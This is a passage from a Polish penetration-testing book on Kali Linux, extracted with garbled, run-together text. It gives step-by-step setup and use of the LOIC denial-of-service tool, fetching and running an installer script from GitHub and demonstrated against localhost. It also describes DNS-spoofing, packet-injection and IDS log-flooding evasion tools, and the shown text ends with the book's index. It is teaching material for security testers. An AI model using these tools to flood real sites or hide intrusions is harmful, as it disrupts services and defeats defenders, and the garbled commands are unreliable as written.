Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 36: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

